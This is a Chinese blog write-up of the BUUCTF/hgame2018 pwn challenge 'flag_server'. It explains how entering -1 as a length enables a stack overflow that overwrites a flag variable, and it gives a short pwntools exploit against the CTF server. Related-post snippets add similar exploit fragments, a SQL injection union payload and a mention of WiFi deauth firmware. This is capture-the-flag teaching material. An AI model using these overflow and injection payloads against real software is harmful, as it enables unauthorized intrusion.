[BUUCTF-pwn]——hgame2018_flag_server

最新推荐文章于 2022-03-04 12:35:55 发布

Y-peak

最新推荐文章于 2022-03-04 12:35:55 发布

阅读量451

点赞数

分类专栏： # BUUCTF

本文链接：https://blog.youkuaiyun.com/Y_peak/article/details/115417479

版权

BUUCTF 专栏收录该内容

89 篇文章

订阅专栏

[BUUCTF-pwn]——hgame2018_flag_server

保护开启了 NX和canary
看下反汇编，只要v10非0就可以得到flag, 也就是v6 = v8，但是显然v8是一个随机数，并且没有找到可以修改的地方。

在这里插入图片描述
仔细观察上面的代码，一旦v5为负数，我们就可以无限输入了，并且s1距离v10为0x40 = 64，我们只需要输入0x40个字符就可以开始修改v10了

exploit

from pwn import *
p = remote("node3.buuoj.cn",28128)
p.sendlineafter('your username length: ','-1')
payload= 'a' * 0x40 + p32(1)
p.sendlineafter('whats your username?\n',payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Y-peak

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BUUCTF hgame2018_flag_server

weixin_45441024的博客

11-28

477

BUUCTF hgame2018_flag_server 下载附件之后永远都是先check一下紧接着我们将其拖入IDA中查看一下： int __cdecl main(int argc, const char **argv, const char **envp) { unsigned int v3; // eax@13 int result; // eax@20 int v5; // ecx@20 int v6; // [sp+8h] [bp-60h]@6 int v7; // [sp

hgame-2018 CTFwp（杭电信安）week3

苟有恒，必有三更眠，五更起。

03-04

1503

送分的sqli这题没有任何过滤什么的，真的是很简单了。 1 and 1=-1 union select 1,schema_name from information_schema.schemata查看库名，得：1 information_schema 1 test 1 week3_sqliiii2?id=1 and 1=-1 union select 1,table_name f

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF(pwn)hgame2018_flag_server(简单的栈溢出)

半岛铁盒的博客

04-05

392

这一题主要就分析清楚程序的执行流程就可以做出来了; v10=1就可以得出答案; 由于v5=-1;输入长度可以很大,造成溢出,点进去s1 溢出覆盖到v10 满足条件 from pwn import* p = remote("node3.buuoj.cn",26244) p.sendlineafter("your username length: ",'-1') payload='a'*0x40+p32(1) p.sendlineafter("whats your username?",payload.

hgame2018_flag_server

z1r0的博客

03-01

404

hgame2018_flag_server 查看保护 v10为1就可以cat flag。这题的漏洞点出在了read_n这里，当a2为-1时，可以输入很长的一个数值。输入的数据和要覆盖的数据差了0x40。攻击思路：用-1输入长数据，放0x40的无用数据第0x41这里放入1即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if deb

HGAME 2017 or 2018 PWN levels

qq_42192672的博客

11-12

987

这个算是做之前的复现吧，感谢Veritas501 WEEK1 1.flag server 拖进IDA看一下流程倒着看，要有flag-----v8=1-----v5=v6-----s1=admin，我们可以把s1覆盖掉-----username长度不能大于63，不能等于0-----之后还要猜出随机数v6，看一下怎么覆盖这些变量都在一起，美滋滋 exp from pwn...

BUUCTF-pwn2_sctf_2016

weixin_44145820的博客

03-06

1097

这题利用的是负数转无符号数造成缓冲区溢出，以及泄露libc基地址执行ROP 题目分析由于NX开启，我们考虑使用ROP，Canary没有打开使得这题变得很方便下面是vuln函数：在该函数中，程序读入一个字符串并转化为带符号整形（signed int），这时，如果我们输入负数可以避开不能大于32的检查在get_n函数中，读入长度被强制转换为unsigned int，此时-1变成了42949...

BUUCTF-Pwn-get_started_3dsctf_2016

餐桌上的猫

03-04

248

题目截图

Wi-PWN_8.0_ENGLISH_OLED.bin

08-25

这是ESP8266的带OLED显示的WIFI杀手固件。

【BUUCTF - PWN】ciscn_2019_c_1

古月浪子的博客

03-20

4219

checksec一下 IDA打开看看，encrypt函数内存在栈溢出漏洞由于程序会将输入的内容加密，这会破坏我们的payload，所以注意到strlen函数，通过在payload开头放上 \0 来绕过加密由于程序内没有后门函数，也没有system函数，所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的，因此调用system需要栈对齐，这里填充ret来对齐 from pwn...

hgame2019 week3 wp

qq_42192672的博客

02-16

1253

上周的wp我咕了，图片太多，云不想弄，第三周堆有点难受，之后把tcache抽空学一下 Pwn namebook 打开程序，五个功能，没有开启PIE，没有后门函数以及system，需要泄露 64为程序中，每一次创建的chunk是0x80大小，实际大小0x90，最多建立10个name struct eachname { int ptr[i]; //size:0x80 } 分析一下个函数...

BUUCTF：[HCTF 2018]Hide and seek

Nobody Anyone

03-30

2279

BUUCTF：[HCTF 2018]Hide and seek 参考：https://www.jianshu.com/p/d20168da7284 先随便输入账号密码登录提示我们上传zip文件上传一个文件压缩后的zip，输出了文件压缩前的内容可能是有文件读取，我们创建一个软链接（类似windows的快捷方式）指向一个服务器上的文件，试试看能不能读取 root@mochu7:~/Desk...

buuoj Pwn writeup 151-155

yongbaoii的博客

05-28

417

151 ciscn_2019_sw_1 保护要注意到的是RELRO一点没开，这意味着.fini_array是可以覆盖的。栈上的格式化字符串。 system也有了。 printf只能用一次，但是我们前面说.fini_array可以覆盖，所以我们第一次先覆盖它为main，制造循环，然后劫持scanf的got表，进行利用就好。要注意的是在我们覆盖.fini_array的意思是在返回的时候以此调用里面的函数，而这个题.fini_array数组只有一个数组，所以我们只能通过它来返回一次main函数，所以我们一

[BUUCTF-pwn]——warmup_csaw_2016

Y_peak的博客

01-30

4962

BUUCTF——warmup_csaw_2016 题目地址：https://buuoj.cn/challenges 题目：管他三七二十一，先将文件下载下来再说。老规矩，现在Linux上用checksec看看文件。64位，Stack、NX、PIE都没有开，应该是栈溢出的题。赶快 go go go 去window 上用IDA反汇编看看，看到返回的是gets函数，一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。按Shift + F12，看一下字符串。不看不知道一看有惊喜。cat flag.

[BUUCTF-pwn]——ciscn_2019_n_3

Y_peak的博客

11-20

3202

[BUUCTF-pwn]——ciscn_2019_n_3 结构体： //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u

[BUUCTF-pwn]——ciscn_2019_n_8

Y_peak的博客

02-10

2590

[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目上去checksec一下,吓一跳保护基本全开了。在IDA中一看，开心了。如此简单　只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +

[BUUCTF-pwn]——jarvisoj_level0

Y_peak的博客

01-31

2333

[BUUCTF-pwn]——jarvisoj_level0 题目地址：https://buuoj.cn/challenges#jarvisoj_level0 题目：还是先下载下来在Linux上checksex一下，基本确实又是栈溢出了。 64位，所以我们用64位的IDA打开，没什么有用的信息，点开vulnerable_function函数发现栈溢出的read函数，前面为0意味着标准读入，后面的长度也可以。没毛病就是这个地方了。再翻翻其他函数，发现了我们想要的system函数。找到位置，和需要覆

[BUUCTF-pwn]——others_shellcode

Y_peak的博客

02-12

1589

[BUUCTF-pwn]——others_shellcode 题目地址: https://buuoj.cn/challenges#others_shellcode peak 小知识写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表中找到对应的系统调用号,进行调用, 其中系统调用号用 eax 储存

[BUUCTF-pwn]——ciscn_2019_es_2(内涵peak小知识)

Y_peak的博客

02-16

1539

[BUUCTF-pwn]——ciscn_2019_es_2 题目地址: https://buuoj.cn/challenges#ciscn_2019_es_2 这是一道栈劫持的题,第一次写这种题的题解写的详细一点。栈劫持 or 栈迁移栈劫持也可以称为栈迁移，用来解决栈本身可以利用的空间不够用，一般是溢出空间不够用,没办法有效构造rop链。这个时候我们可以通过劫持ebp的方式，利用leave 和 ret两个汇编指令来做到栈劫持(栈迁移)。 leave 等价于 mov ebp, esp; pop

[BUUCTF-pwn]——wdb2018_guess (environ环境变量)

Y_peak的博客

04-06

1466

[BUUCTF-pwn]——wdb2018_guess 这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的. 这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!! 一个常见的保护开启NX canary RELRO 在IDA中看看, 那个buf就是我们要的flag 先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次. 思路思路来了利用主动触发canary保护, 调用**

buuctf-pwn入门